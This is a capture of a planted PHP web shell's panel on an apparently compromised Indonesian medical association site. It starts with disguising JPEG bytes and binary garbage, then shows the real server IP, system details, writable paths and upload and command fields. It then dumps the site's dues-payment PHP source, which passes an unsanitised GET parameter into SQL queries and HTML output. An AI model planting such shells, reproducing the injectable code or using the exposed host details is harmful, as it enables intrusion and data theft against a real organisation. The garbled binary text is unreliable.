JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 88.223.91.186  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/xlama/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/anggota/xlama/bayar_iur.php
<?php include "header.php"; ?>



<?php

if (!isset($_SESSION['submit'])) {

$_SESSION['submit'] = true;

}

?>

<style type="text/css">

<!--

.style2 {

	font-size: 12px;

	font-weight: bold;

}

.style3 {font-size: 12px}

-->



@import url(http://fonts.googleapis.com/css?family=Montserrat:400,700);



html{    

  background-size: cover;

  height:100%;

}



#feedback-page{

	text-align:center;

}



#form-main{

	width:100%;

	float:left;

	padding-top:0px;

}



#form-div {

	background-color:rgba(72,72,72,0.4);

	padding-left:35px;

	padding-right:35px;

	padding-top:35px;

	padding-bottom:50px;

	width: 400px;

	float: left;

	left: 50%;



  margin-top:30px;

	margin-left: 100px;

  -moz-border-radius: 7px;

  -webkit-border-radius: 7px;

}



.feedback-input {

	color:#3c3c3c;

	font-family: Helvetica, Arial, sans-serif;

  font-weight:500;

	font-size: 18px;

	border-radius: 0;

	line-height: 22px;

	background-color: #fbfbfb;

	padding: 13px 13px 13px 54px;

	margin-bottom: 10px;

	width:100%;

	-webkit-box-sizing: border-box;

	-moz-box-sizing: border-box;

	-ms-box-sizing: border-box;

	box-sizing: border-box;

  border: 3px solid rgba(0,0,0,0);

}



.feedback-input:focus{

	background: #fff;

	box-shadow: 0;

	border: 3px solid #3498db;

	color: #3498db;

	outline: none;

  padding: 13px 13px 13px 54px;

}



.focused{

	color:#30aed6;

	border:#30aed6 solid 3px;

}



/* Icons ---------------------------------- */

#name{

	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);

	background-size: 30px 30px;

	background-position: 11px 8px;

	background-repeat: no-repeat;

}



#name:focus{

	background-image: url(http://rexkirby.com/kirbyandson/images/name.svg);

	background-size: 30px 30px;

	background-position: 8px 5px;

  background-position: 11px 8px;

	background-repeat: no-repeat;

}



#email{

	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);

	background-size: 30px 30px;

	background-position: 11px 8px;

	background-repeat: no-repeat;

}



#email:focus{

	background-image: url(http://rexkirby.com/kirbyandson/images/email.svg);

	background-size: 30px 30px;

  background-position: 11px 8px;

	background-repeat: no-repeat;

}



#comment{

	background-image: url(http://rexkirby.com/kirbyandson/images/comment.svg);

	background-size: 30px 30px;

	background-position: 11px 8px;

	background-repeat: no-repeat;

}



textarea {

    width: 100%;

    height: 150px;

    line-height: 150%;

    resize:vertical;

}



input:hover, textarea:hover,

input:focus, textarea:focus {

	background-color:white;

}



#button-blue{

	font-family: 'Montserrat', Arial, Helvetica, sans-serif;

	float:left;

	width: 100%;

	border: #fbfbfb solid 4px;

	cursor:pointer;

	background-color: #3498db;

	color:white;

	font-size:24px;

	padding-top:22px;

	padding-bottom:22px;

	-webkit-transition: all 0.3s;

	-moz-transition: all 0.3s;

	transition: all 0.3s;

  margin-top:-4px;

  font-weight:700;

}



#button-blue:hover{

	background-color: rgba(0,0,0,0);

	color: #0493bd;

}

	

.submit:hover {

	color: #3498db;

}

	

.ease {

	width: 0px;

	height: 74px;

	background-color: #fbfbfb;

	-webkit-transition: .3s ease;

	-moz-transition: .3s ease;

	-o-transition: .3s ease;

	-ms-transition: .3s ease;

	transition: .3s ease;

}



.submit:hover .ease{

  width:100%;

  background-color:white;

}



@media only screen and (max-width: 580px) {

	#form-div{

		left: 3%;

		margin-right: 3%;

		width: 100%;

		margin-left: 0;

		padding-left: 3%;

		padding-right: 3%;

	}

</style>



<link rel="stylesheet" href="//code.jquery.com/ui/1.12.1/themes/base/jquery-ui.css">

		<script src="https://code.jquery.com/jquery-1.12.4.js"></script>

		<script src="https://code.jquery.com/ui/1.12.1/jquery-ui.js"></script>

	 	<script>

<!--

$( function() {

	    		$( "#datepicker1" ).datepicker({ dateFormat: 'dd-mm-yy' });

	    		$( "#datepicker2" ).datepicker({ dateFormat: 'dd-mm-yy' });

				$( "#datepicker3" ).datepicker({ dateFormat: 'dd-mm-yy' });

				$( "#datepicker4" ).datepicker({ dateFormat: 'dd-mm-yy' });

				$( "#datepicker5" ).datepicker({ dateFormat: 'dd-mm-yy' });

	  		} );



function MM_findObj(n, d) { //v4.01

  var p,i,x;  if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {

    d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}

  if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];

  for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);

  if(!x && d.getElementById) x=d.getElementById(n); return x;

}

//-->

</script> 







<?php

$sekarang 	= date('d-m-Y');

$npm=$_GET['npm'];





//$npm= isset($e['npm']) ? $e['npm'] : null;

$sql=mysqli_query($konek, "SELECT * FROM h_anggota where  npm='$npm'");	





$e=mysqli_fetch_array($sql);



//$bulan	=$e['bulan']; 

//$npm	=$e['npm']; 



//	=$_GET['per']; 



//Tanggal Minggu Lalu dari Tanggal Tertentu

	   





                 

            

            $query_month=$konek->query("SELECT * FROM h_anggota where npm='$npm' order by id_tagihan desc limit 1");					   

                                   

                                   

                     $df=$query_month->fetch_assoc();

                      

						   $iuran2 = $df['tgliuran'];

						   $mbstr2 = $df['mbstr'];

						   $nominal = $df['nominal_iur'];

						   $awaliuran2 = $df['awalmbstr'];





	$tglbayar2 = $df['tglbayar_iur'];



    $date = new DateTime($mbstr2);

    $mbstr = $date->format('d-m-Y');	



   $date = new DateTime($iuran2);

    $iuran = $date->format('d-m-Y');



  $date = new DateTime($sekarang2);

    $sekarang= $date->format('d-m-Y');



 //$date = new DateTime($tglbayar2);

//    $tglbayar = $date->format('d-m-Y');





$tgliuran= $df['tgliuran']; 

	   

//$tanggal = "2015-05-19";

$tahun_depan5 = date('d-m-Y', strtotime('+5 year', strtotime($tgliuran)));	 	   

echo "<br />";	



?>



</form>

<!-- proses edit data -->

  <div id="form-main">

  <div id="form-div" class="px-3 py-5 bg-gradient-info text-white">



  

    <div class="card-body">

                  <div class="row">

                  <div class="col-md-12">

                  <div class="form-group ">   

 

                  

   <center><h4><b>IURAN ANGGOTA</b></h4></center>  

					  <br><br>

   <form method="post" action="upl_iuran_v2.php" enctype="multipart/form-data">

	   

	   

	    <p class="name">      <input name="idnonspp" type="hidden"  readonly class="form-control"  value="<?php echo $df['id_tagihan']; ?>"  />

		<p class="name">      <input name="iuran" type="hidden"  readonly class="form-control"  value="<?php echo $iuran ?>"  />  



	     <p class="name">      <input name="npm" type="hidden"  readonly class="form-control"  value="<?php echo $df['npm']; ?>"  />



       <p class="name">      <input name="npa" type="hidden"  readonly class="form-control"  value="<?php echo $df['npa']; ?>"  />

      </p>

      <label for="tbayar">Nama</label><br>

         <p class="name">      <input name="nmlead" readonly class="form-control"  value="<?php echo $df['nmlead']; ?>"  />

      </p>

	    <input name="mbstr" class="form-control" type="hidden" id="datepicker1"  value="<?php echo $mbstr  ?>" size="11">

	   	  </br> </p>

	   <label for="jumlah"class="black"><b>Input Tanggal dengan Format : Bulan/Tanggal/Tahun </b></label>

				

    

	        </p>  	



     <label for="jumlah"class="black"><b>Tanggal Pembayaran </b></label>

	   <input name="tbayar" class="form-control" id="datepicker4"  value="<?php echo $sekarang  ?>" size="11">

 </p> 





   <label for="jumlah"class="black"><h4><b>Tanggal Awal IURAN</b></h4>

	       <label for="jumlah"class=""><b>Format : Bulan/Tanggal/Tahun</b>  </label>

		

      </p> 

	   <input name="tglawal" class="form-control" id="datepicker2"  value="<?php echo $iuran  ?>" size="11">

  </br> 



   <label for="jumlah"class="black"><h4><b>Tanggal Akhir IURAN</b></h4>

	       <label for="jumlah"class=""><b>Format : Bulan/Tanggal/Tahun</b>  </label>

		

      </p> 

	   <input name="tglakhir" class="form-control" id="datepicker3"  value="<?php echo $tahun_depan5  ?>" size="11">





	 			      </br>       

	   

	       <label for="jumlah"class=""><h4><b>Nominal Iuran </h4></b>
               <label for="jumlah"class=""><b>60 Bulan x Rp 30000 </b>
     

    

	   <input name="jumlah" class="form-control" type="number" placeholder="Isi Nominal Pembayaran Iuran Tanpa titik atau koma" value="1800000" size="8">



      </p>   

	   

	  <br> <br> 

	   

	<h4><b>Upload Bukti Transfer Disini:</b></h4>

    - Ukuran File Maximal: 3 MB.<br> 

	- format gambar jpg, jpeg atau png. <br>  

	

	 	<br>  

  

		 </p>

	   <label for="nmlead">Nama Dokumen : </label><br>

	 <input name="nm_surat" type = "text" placeholder="Isi Dokumen" class="form-control"  value="Bukti Transfer Iuran /Kwitansi"  />	

			<p/>

					  



    <input name="npm" type = "hidden" readonly class="form-control"  value="<?php echo $_GET['npm']  ?>"  />



    <input type="hidden" name="MAX_FILE_SIZE" value="10000000" />

   <br>

		Pilih File: 

		<br><br>

		<input class="form-control"  name="file" type="file" style="cursor:pointer;" />

    <br>



		<button type="submit" class="btn btn-success form-control" name="submit"><span class="glyphicon glyphicon-upload"></span> Click untuk Upload Document</button>

    </form>

<br/><br/>

<center>

   

                 

                 </center> 

  </div>

</div>










Youez - 2016 - github.com/yon3zu
LinuXploit